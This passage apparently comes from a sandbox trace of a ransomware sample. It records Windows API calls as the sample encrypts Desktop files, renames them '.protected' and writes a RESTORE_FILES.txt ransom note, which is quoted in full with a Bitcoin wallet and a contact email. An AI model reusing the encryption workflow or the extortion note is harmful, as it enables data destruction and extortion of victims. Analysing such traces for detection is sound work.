dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp") returned 119 [0091.192] StrStrW (lpFirst="K8Inyx3A_O61.bmp", lpSrch=".txt") returned 0x0 [0091.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp") returned 119 [0091.192] StrStrW (lpFirst="K8Inyx3A_O61.bmp", lpSrch=".rar") returned 0x0 [0091.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp") returned 119 [0091.192] StrStrW (lpFirst="K8Inyx3A_O61.bmp", lpSrch=".zip") returned 0x0 [0091.192] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.193] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.193] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.193] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.193] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.193] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.193] CloseHandle (hObject=0x150) returned 1 [0091.193] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp.protected") returned 129 [0091.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\k8inyx3a_o61.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\k8inyx3a_o61.bmp.protected")) returned 1 [0091.196] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.196] lstrcmpiW (lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="Windows") returned -1 [0091.196] lstrcmpiW (lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="Program Files") returned 1 [0091.196] lstrcmpiW (lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="Program Files (x86)") returned 1 [0091.196] lstrcmpiW (lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="$Recycle.bin") returned 1 [0091.196] lstrcmpiW (lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="System Volume Information") returned -1 [0091.196] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls") returned 125 [0091.196] StrStrIW (lpFirst="RO_pQkhqW-tc 83RVO.xls", lpSrch=".protected") returned 0x0 [0091.197] lstrcmpW 
(lpString1="RO_pQkhqW-tc 83RVO.xls", lpString2="RESTORE_FILES.txt") returned 1 [0091.197] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.197] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ro_pqkhqw-tc 83rvo.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls") returned 125 [0091.197] StrStrW (lpFirst="RO_pQkhqW-tc 83RVO.xls", lpSrch=".txt") returned 0x0 [0091.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls") returned 125 [0091.197] StrStrW (lpFirst="RO_pQkhqW-tc 83RVO.xls", lpSrch=".rar") returned 0x0 [0091.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls") returned 125 [0091.197] StrStrW (lpFirst="RO_pQkhqW-tc 83RVO.xls", lpSrch=".zip") returned 0x0 [0091.197] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x5e1, lpOverlapped=0x0) returned 1 [0091.198] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa1f, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.198] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x5e1, lpOverlapped=0x0) returned 1 [0091.198] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.198] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.198] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.198] CloseHandle (hObject=0x150) returned 1 [0091.198] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls.protected") returned 135 [0091.198] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ro_pqkhqw-tc 83rvo.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ro_pqkhqw-tc 83rvo.xls.protected")) returned 1 [0091.199] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0091.199] lstrcmpiW (lpString1="s3esEghE tQRaK.png", lpString2="Windows") returned -1 [0091.199] lstrcmpiW (lpString1="s3esEghE tQRaK.png", lpString2="Program Files") returned 1 [0091.199] lstrcmpiW (lpString1="s3esEghE tQRaK.png", lpString2="Program Files (x86)") returned 1 [0091.199] lstrcmpiW (lpString1="s3esEghE tQRaK.png", lpString2="$Recycle.bin") returned 1 [0091.199] lstrcmpiW (lpString1="s3esEghE tQRaK.png", lpString2="System Volume Information") returned -1 [0091.199] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png") returned 121 [0091.199] StrStrIW (lpFirst="s3esEghE tQRaK.png", lpSrch=".protected") returned 0x0 [0091.199] lstrcmpW (lpString1="s3esEghE tQRaK.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.199] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.199] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\s3eseghe tqrak.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png") returned 121 [0091.199] StrStrW (lpFirst="s3esEghE tQRaK.png", lpSrch=".txt") returned 0x0 [0091.199] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png") returned 121 [0091.199] StrStrW (lpFirst="s3esEghE tQRaK.png", lpSrch=".rar") returned 0x0 [0091.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png") returned 121 [0091.199] StrStrW (lpFirst="s3esEghE tQRaK.png", lpSrch=".zip") returned 0x0 [0091.199] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.200] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.200] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.200] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.200] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.200] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.200] CloseHandle (hObject=0x150) returned 1 [0091.201] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png.protected") returned 131 [0091.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\s3eseghe tqrak.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\s3eseghe tqrak.png.protected")) returned 1 [0091.201] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.201] lstrcmpiW (lpString1="XNxBnWQvS.csv", lpString2="Windows") returned 1 [0091.201] lstrcmpiW (lpString1="XNxBnWQvS.csv", lpString2="Program Files") returned 1 [0091.201] lstrcmpiW (lpString1="XNxBnWQvS.csv", lpString2="Program Files (x86)") returned 1 [0091.201] lstrcmpiW (lpString1="XNxBnWQvS.csv", lpString2="$Recycle.bin") returned 1 [0091.201] lstrcmpiW (lpString1="XNxBnWQvS.csv", lpString2="System Volume Information") returned 1 [0091.201] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv") returned 116 [0091.201] StrStrIW (lpFirst="XNxBnWQvS.csv", lpSrch=".protected") returned 0x0 [0091.201] lstrcmpW (lpString1="XNxBnWQvS.csv", lpString2="RESTORE_FILES.txt") returned 1 [0091.201] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.201] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\xnxbnwqvs.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.202] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv") returned 116 [0091.202] StrStrW (lpFirst="XNxBnWQvS.csv", lpSrch=".txt") returned 0x0 [0091.202] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv") returned 116 [0091.202] StrStrW (lpFirst="XNxBnWQvS.csv", lpSrch=".rar") returned 0x0 [0091.202] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv") returned 116 [0091.202] StrStrW (lpFirst="XNxBnWQvS.csv", lpSrch=".zip") returned 0x0 [0091.202] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x17f0, lpOverlapped=0x0) returned 1 [0091.202] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe810, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.202] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x17f0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x17f0, lpOverlapped=0x0) returned 1 [0091.202] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.203] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.203] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.203] CloseHandle (hObject=0x150) returned 1 [0091.203] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv.protected") returned 126 [0091.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\xnxbnwqvs.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\xnxbnwqvs.csv.protected")) returned 1 [0091.205] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0091.205] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0091.205] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RESTORE_FILES.txt") returned 120 [0091.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.205] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.205] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | 
out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0091.206] lstrlenA (lpString="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") returned 684 [0091.206] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0091.206] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.206] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0091.206] CloseHandle (hObject=0x14c) returned 1 [0091.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.207] lstrcmpiW (lpString1="tECR.m4a", lpString2="Windows") returned -1 [0091.207] lstrcmpiW (lpString1="tECR.m4a", lpString2="Program Files") returned 1 [0091.207] lstrcmpiW (lpString1="tECR.m4a", lpString2="Program Files (x86)") returned 1 [0091.207] lstrcmpiW (lpString1="tECR.m4a", lpString2="$Recycle.bin") returned 1 [0091.207] lstrcmpiW (lpString1="tECR.m4a", lpString2="System Volume Information") returned 1 [0091.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a") returned 93 [0091.207] StrStrIW (lpFirst="tECR.m4a", lpSrch=".protected") returned 0x0 [0091.207] lstrcmpW (lpString1="tECR.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0091.207] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.207] CryptEncrypt 
